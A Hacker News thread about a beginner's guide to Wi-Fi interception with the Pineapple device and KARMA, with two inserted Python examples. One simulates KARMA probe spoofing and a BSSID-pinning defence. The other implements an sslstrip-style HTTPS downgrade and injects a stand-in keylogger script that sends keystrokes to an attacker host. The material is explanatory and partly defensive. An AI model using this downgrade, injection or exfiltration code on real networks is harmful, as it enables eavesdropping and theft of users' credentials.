Beginner's Guide to Wi-fi Interception (troyhunt.com)
211 points by nopassrecover on Sept 20, 2013 | 41 comments



I don't understand why people are putting this article down by saying "Nothing Novel In it"; "i have been doing this for X years. I know all this stuff"; "This is too simple. Too Basic"

GUYS!!! It's titled "BEGINNER'S Guide to WiFi Interception", so OF COURSE it's basic. It isn't meant for security veterans like you guys. The author is apparently a security guy too, but he just WANTED to explain it in as simple a way as possible.


> ... each unsecured network is the Pineapple responding to a probe request from the iPhone with the name of the SSID it was previously associated with. The names include that of an old wireless router I replaced some years back, my parents’ network I was connected to interstate just the other day and an airline lounge in a far flung corner of the world.

Whoa, what? This is really how it works? This implies that anywhere you go with your laptop, someone can sit there and get a list of every wifi you've ever connected to. :(

I don't understand why this disclosure is necessary, since you can list all nearby wifis, even ones you've never connected to. Shouldn't it be possible for a wifi client to get a list of all nearby wifis, then only attempt to connect to the one it knows, without telling the others anything about what it's looking for?

Didn't finish reading the article, because it's going step by step and I don't plan to actually set up a Pineapple, but this surprising bit was the main takeaway for me.


Yes.

Want to know something scarier? Snoopy - http://www.youtube.com/watch?v=Vsn7_4qUdwk&feature=youtu.be .

Well worth the watch.



Yes, that's exactly how this works. The way to solve it would be for a device to compare the last known BSSID of an access point to that of the device it's about to connect to (similar to comparing MAC addresses). Except that almost no one does this.

http://en.wikipedia.org/wiki/Service_set_(802.11_network)#Ba...
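The leak the two comments above describe, as an added example (not code from the article, from the Pineapple, or from KARMA): a directed 802.11 probe request carries the remembered SSID in the clear, a KARMA-style access point simply answers every one of them with whatever SSID was asked for, and a client that only matches on SSID accepts the answer. The frames are built by hand here (no FCS, minimal information elements) and all MACs, SSIDs and the "Pineapple" BSSID are constructed values; the BSSID check at the end implements the mitigation proposed in the parent comment.

```python
"""Why a remembered SSID list leaks: directed 802.11 probe requests carry the
SSID in cleartext, and a KARMA-style AP answers every one of them.
All frames below are constructed by hand (no FCS), not captured traffic."""
import struct

BROADCAST = b"\xff" * 6
IE_SSID, IE_RATES = 0, 1


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def mac_bytes(s: str) -> bytes:
    return bytes(int(x, 16) for x in s.split(":"))


def parse_ies(body: bytes) -> dict:
    """Walk the tagged parameters (information elements): id, length, value."""
    ies, i = {}, 0
    while i + 2 <= len(body):
        eid, ln = body[i], body[i + 1]
        ies[eid] = body[i + 2:i + 2 + ln]
        i += 2 + ln
    return ies


def mgmt_subtype(frame: bytes):
    fc = frame[0]
    if fc & 0x0C:          # bits 2-3 are the frame type; 0 means management
        return None
    return fc >> 4         # bits 4-7 are the subtype


def build_probe_request(client_mac: str, ssid: str) -> bytes:
    """Subtype 4. Addr1 = DA (broadcast), Addr2 = SA (the client), Addr3 = BSSID."""
    hdr = b"\x40\x00" + b"\x00\x00" + BROADCAST + mac_bytes(client_mac) + BROADCAST + b"\x00\x00"
    s = ssid.encode()
    return hdr + bytes([IE_SSID, len(s)]) + s + bytes([IE_RATES, 4, 0x82, 0x84, 0x8B, 0x96])


def parse_probe_request(frame: bytes):
    """Returns (client_mac, ssid); ssid == "" for a wildcard (broadcast) probe."""
    if len(frame) < 24 or mgmt_subtype(frame) != 4:
        return None
    ies = parse_ies(frame[24:])
    return mac_str(frame[10:16]), ies.get(IE_SSID, b"").decode(errors="replace")


def build_probe_response(ap_bssid: str, client_mac: str, ssid: str) -> bytes:
    """Subtype 5. Fixed fields: timestamp(8), beacon interval(2), capability(2)."""
    b = mac_bytes(ap_bssid)
    hdr = b"\x50\x00" + b"\x00\x00" + mac_bytes(client_mac) + b + b + b"\x00\x00"
    fixed = struct.pack("<QHH", 0, 100, 0x0001)   # capability bit 0 = ESS
    s = ssid.encode()
    return hdr + fixed + bytes([IE_SSID, len(s)]) + s


def parse_probe_response(frame: bytes):
    """Returns (bssid, ssid) as the client sees them."""
    if len(frame) < 36 or mgmt_subtype(frame) != 5:
        return None
    ies = parse_ies(frame[36:])
    return mac_str(frame[16:22]), ies.get(IE_SSID, b"").decode(errors="replace")


def karma_respond(ap_bssid: str, frame: bytes):
    """KARMA logic: whatever SSID the client asks for, claim to be that network."""
    parsed = parse_probe_request(frame)
    if parsed is None:
        return None
    client, ssid = parsed
    if ssid == "":   # wildcard probe: nothing is leaked, a normal AP answers with its own SSID
        return None
    return build_probe_response(ap_bssid, client, ssid)


def naive_client_accepts(remembered: dict, resp: bytes) -> bool:
    """What most supplicants did: match the remembered network on SSID only."""
    _bssid, ssid = parse_probe_response(resp)
    return ssid in remembered


def pinned_client_accepts(remembered: dict, resp: bytes) -> bool:
    """The check proposed above: the BSSID must match the one last seen for that SSID."""
    bssid, ssid = parse_probe_response(resp)
    return remembered.get(ssid) == bssid


def demo():
    # Constructed: a client remembering three networks and the BSSID it last saw each on.
    remembered = {"HomeNet-old": "00:11:22:33:44:55",
                  "ParentsWifi": "66:77:88:99:aa:bb",
                  "LoungeFree": "cc:dd:ee:ff:00:11"}
    client, pineapple = "a4:5e:60:00:00:01", "de:ad:be:ef:ca:fe"   # constructed MACs
    leaked, naive, pinned = [], [], []
    for ssid in remembered:
        req = build_probe_request(client, ssid)
        leaked.append(parse_probe_request(req)[1])       # what any passive listener reads
        resp = karma_respond(pineapple, req)
        naive.append(naive_client_accepts(remembered, resp))
        pinned.append(pinned_client_accepts(remembered, resp))
    return leaked, naive, pinned
```

Running demo() shows all three SSIDs readable off the air, the naive client accepting all three forged responses, and the BSSID-pinning client rejecting all three. One caveat on the check as proposed: a network with several access points (an ESS that roams) has several legitimate BSSIDs, so a real implementation would have to store the set of BSSIDs seen rather than only the last one.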


This surprised me as well. I would speculate it is motivated by networks with SSID broadcast turned off. You'd never find them by parsing the network list.


Makes sense, but I've never ever used such a network and so would gladly turn off this feature. :(

It looks like the iPhone is (or was, as of 2012) uniquely bad because it leaks recently used MAC addresses, while it's common for devices to leak names but not MAC addresses:

http://seclists.org/dailydave/2012/q1/59


Potential solution on OS level: 1) when connecting to a network for the first time, remember its location 2) only send out those SSIDs that belong to networks which are close to your current location

Does anything like that exist? Maybe for Android?


How would that work with location unaware devices?


It wouldn't.


Troy's great strengths come from demonstrating to the average Joe just how easy this is. He's not going over board on the technical side because his aim isn't to get everyone doing this. By and large he's pushing companies with woefully insecure systems into securing them by using the media to spread the message. Though he usually targets companies with web based forms and authentication systems he appears here to be doing the same thing. If he generates enough chatter about it, more pressure will be put on those responsible to fix the problem.

P.S. The vague "that article rife with errors" and "it's pretty obvious those screen caps have been photoshopped to try and prove an incorrect point" comments are pitiful and pointless without some explanations. But ooh, I'm sure you are all important and busy without the time to explain yourself.


If you want to know more about KARMA, we came up with it in 2004 and the original docs and code are on our website: http://www.trailofbits.com/software/#karma


You were involved in KARMA? I thought that was just Dino and Shane. Shane is working with you guys now too?


:-), my bad. Shane doesn't work for us. His name is listed on the research page, but I should add his name to the software page to credit him there too.


You can do everything that Pineapple does without Pineapple, I believe. The advantage here is that it's all in one place, the hardware's figured out, and it's accessible through a web interface.

And you don't have to know ten years' worth of knowledge to get useful (but probably illegal) stuff out of it.

At least that's what I'm getting out of this article.

I can very easily see a house being raided and this being used against the owner as evidence, though. There are very few legitimate uses for something like this, aren't there?


You can see a house being raided for owning a Pineapple...?


Nope.

I can see a house being raided because of other computer crime evidence, and the fact that the suspect owned a Pineapple would be used against him in court.


Ah the pineapple, a lovely single device mitm for all of your wifi based needs.

I've been looking into acquiring one for months but I can't think of any use case that wouldn't be immoral.

I wonder if I could sit in a coffee shop and provide a faster connection than standard? I'd be like a smaller, slightly more malicious google in that I provide a service in exchange for sweet sweet packets!

Also, what's with all the posts from troy? I've been following him for awhile and it's curious to see these just popping up now.


Here is one moral use.

Don't do any mitm or forwarding, but just sit with the CEO or CIO with one in his office for a few minutes, and show him how his iPhone is suddenly connected to his home network.

Then you can explain all the implications of this. Including that this is a readily available device for low cost. And that this particular attack has been known and documented since 2004.

It would seem unlikely that manufacturers of devices relying on WiFi are unaware of this. Run a bar across their cages to get this fixed.


Article is hidden in Firefox+Ghostery unless Disqus is enabled.


Every Disqus article is with it, just unblock it.


Disallow "apphb.com" and it works.


the article shows for me with Disqus disabled


Here is the advanced guide to Screwing with Wi-Fi: http://www.securitytube.net/groups?operation=view&groupId=9


Dear god is that article rife with errors. Almost every declarative statement made is incorrect.

This is someone looking for a sensational response without taking the time to wonder if the people reading the article, at least here on HN, are ready to call him out on his bullshit.


I've been doing IP networking since the early 90s and I didn't find anything new in this article, except false claims. Also many attacks weren't as advanced as I would have assumed.

Btw. With Windows 3.0, Trumpet Winsock allowed you to snoop IP traffic directly, as well as packet content. So there's nothing new with it either.

I also worked in a networking department monitoring network issues, and it was painfully clear that anyone who used telnet to access a bank was easily monitored. (of course) Best thing was that banks didn't offer any other alternatives back then, except traditional POTS modems, which were just being replaced by IP networking.

Oh boy did I laugh about firesheep news, it was so obvious and over 15 years old trick.

I was naturally expecting this post to contain information on how to MitM HTTPS and SSH sessions. Yes, users are stupid, and they might continue accessing services and logging in even if the cert isn't valid. In addition to that, they could have listed tips on how to create your own cert authority and create "self signed" certs for every site being accessed with HTTPS. We're currently doing that in a corporate environment. The only thing you need to arrange is to use AD to get devices to trust this new cert. When you access facebook.com you'll get a valid https connection with a cert signed by IT. Yes, we can eavesdrop on and virus-monitor https connections too, of course.

I'm sure there are many guys who have much more to add to this short list, what can be done.

Often with high security sites we opt to trust predefined exact public key fingerprint instead of any "publicly" signed cert. Because we all know the problems with official publicly signed certs and authorities.


I will agree with you that it is sensational and a bit irresponsible, but there weren't any glaring inaccuracies. The only novel information in the article was that Wifi devices leak all their past access points to anyone -- if that statement is indeed true (and who knows how many devices it's true for) (edit: apparently the technique has been around since at least 2006). The rest of it was a very basic tutorial on how to snoop on unencrypted traffic, which is usually not something people who need a tutorial on it should be doing.


Well thank you, but that's not useful. Would you mind pointing out some examples of wrong statements? Otherwise I'm none the wiser :(


To be honest, the article isn't really all that wrong or sensationalist - It's a little bit simplified in some spots but for the most part is an accurate depiction of how simple it is to perform man-in-the-middle attacks on the unsuspecting with a device running Karma.

I'm not sure which exact points of article your parent poster has an issue with, though so I can't rebut his arguments.

The first paragraph is relatively straightforward - just posting to HTTPS isn't enough. Your login form has to be HTTPS too, and not mixed-mode. Inject a javascript keylogger into your login form which you served over HTTP? Don't mind if I do.

The rest of the article is just a tutorial on how to get to the point where you can do something like that, by using the Pineapple.

Yes, Karma does actually work like explained in the article, and yes, clients will connect to any AP running Karma or a similar implementation, and it will do it for the exact reason he stated: They will broadcast the SSIDs they 'remember'. Once they're connected to your AP, well, you're on the path between them and anything they try to visit. That's pretty much the definition of being a man in the middle.

The article doesn't go too deep into what you can do and simply mentions that you can take a look at HTTP traffic -- If you can look at it, you can modify it on the fly. If you can do that you can spin up something like SSLstrip[0], or drop in a java driveby or... well, anything you can imagine doing to traffic on the wire.

Note that the pineapple is not the only device that can do this. There's all sorts of things like the expensive and super sneaky Pwn Plug[1] to something like a hand-made minipwner[2] which you can put together with $30 and a bunch of spare time.

[0] http://www.thoughtcrime.org/software/sslstrip/ [1] http://pwnieexpress.com/products/pwnplug-elite [2] http://www.minipwner.com/
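The two moves the comment above describes once you are on the path, rewriting HTTPS references down to HTTP (sslstrip's core idea) and injecting script into a login form that was served over HTTP, as an added example in Python. This is not code from the article, from the Pineapple or from sslstrip; the login page, the page URL and the "keylogger" are constructed stand-ins, and `attacker.invalid` is a reserved, non-resolving name. The `login_form_exposure` check flags the exact mistake the first paragraph of the article is about: a password form whose action is HTTPS but whose page arrived over HTTP.

```python
"""What a man in the middle can do to a login page served over plain HTTP,
even when the form posts to HTTPS. The page and the script are constructed
stand-ins, not real site content or a real payload."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed example of the mixed-mode mistake: HTTP page, HTTPS form action.
LOGIN_PAGE = """<html><body>
<form id="login" action="https://example.com/session" method="post">
  <input name="user"><input name="pass" type="password">
  <input type="submit" value="Log in">
</form>
<a href="https://example.com/account">My account</a>
</body></html>"""

# Stand-in for an injected keylogger: reports each key to a name that never resolves.
INJECTED = ('<script>/* injected by the MITM */document.addEventListener("keydown",'
            'function(e){new Image().src="http://attacker.invalid/k?c="+encodeURIComponent(e.key)})'
            '</script>')


class _FormScan(HTMLParser):
    """Collects each <form> with its action and whether it holds a password field."""
    def __init__(self):
        super().__init__()
        self.forms, self.current = [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.current = {"action": a.get("action", ""), "has_password": False}
            self.forms.append(self.current)
        elif tag == "input" and self.current is not None and a.get("type") == "password":
            self.current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self.current = None


def login_form_exposure(page_url: str, html: str) -> list:
    """One finding per password form. Exposed means an on-path attacker can alter
    the form or inject script, which is the case whenever the *page* was not HTTPS."""
    scan = _FormScan()
    scan.feed(html)
    page_scheme = urlsplit(page_url).scheme
    findings = []
    for f in scan.forms:
        if not f["has_password"]:
            continue
        action_scheme = urlsplit(f["action"]).scheme or page_scheme
        findings.append({"page_scheme": page_scheme,
                         "action_scheme": action_scheme,
                         "exposed": page_scheme != "https" or action_scheme != "https"})
    return findings


def sslstrip_rewrite(html: str) -> str:
    """Downgrade every https:// reference the victim's browser will follow."""
    return re.sub(r"https://", "http://", html)


def inject_script(html: str, payload: str) -> str:
    """Insert script before </body>; the browser runs it in the page's own origin."""
    i = html.lower().rfind("</body>")
    return html[:i] + payload + html[i:] if i != -1 else html + payload


def mitm_transform(page_url: str, html: str, payload: str = INJECTED) -> str:
    """Only HTTP responses pass through the attacker in the clear; an HTTPS page
    never reaches this code, which is the whole point of serving the form over TLS."""
    if urlsplit(page_url).scheme != "http":
        return html
    return inject_script(sslstrip_rewrite(html), payload)


def demo():
    before = login_form_exposure("http://example.com/login", LOGIN_PAGE)
    tampered = mitm_transform("http://example.com/login", LOGIN_PAGE)
    after = login_form_exposure("http://example.com/login", tampered)
    return before, tampered, after
```

In the real tool the rewriting half is paired with a transparent proxy that keeps speaking HTTPS to the server while the victim only ever sees HTTP, so nothing on the server side looks wrong. The check function is the part worth keeping: a page that builds a login form over HTTP is exposed no matter what its form action says, and the only fix is to serve the form page itself over HTTPS.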


Given that it is a "beginners guide to....", it would be simplified and not go deep.


Looking again, it's pretty obvious those screen caps have been photoshopped to try and prove an incorrect point. Definition of circular arguing.


Can you be specific? I think it'd be interesting to a lot of HN readers if you could point out the exact errors.

I'm not super well-versed on Pineapple, so I don't know what's true/not true about what it does/how it does it.


You are ranting about it but don't give any information on what's wrong with the article..


You haven't actually defined what is wrong with it yet...


Honestly, the hype behind the Wi-Fi Pineapple is a little excessive. It's a nice little novelty, but it really doesn't offer anything you couldn't do with the aircrack-ng utilities (airbase-ng for conducting MITM in particular).


As someone that knows next to nothing about internet security, this article was definitely eye-opening. Can anyone suggest further reading on the topic?


Could you do this with a Raspberry Pi, a Netgear antenna, and a crossover cord? Very tempted to try this out, Linux style.


If the software and its dependencies can be compiled for the RPi architecture, it should.


I stopped reading the moment I felt this dude thinks "good old windows" and "microsoft windows world" are better than "the linux things", and from the comments here I think the article is indeed as lame as I suspected.


So you stopped reading an article because the guy does not use your preferred operating system then justify your bias from comments that (at the time of your posting at least) have no evidence that the article is "lame".

Well done.


There are a lot of oldschool guys who are very professional developers in their fields, but who are reluctant to change their OS. I don't think the latter is good or wise, but they are still very knowledgeable in their field. E.g. it's not uncommon to see an embedded Linux developer who uses Windows as his desktop OS.



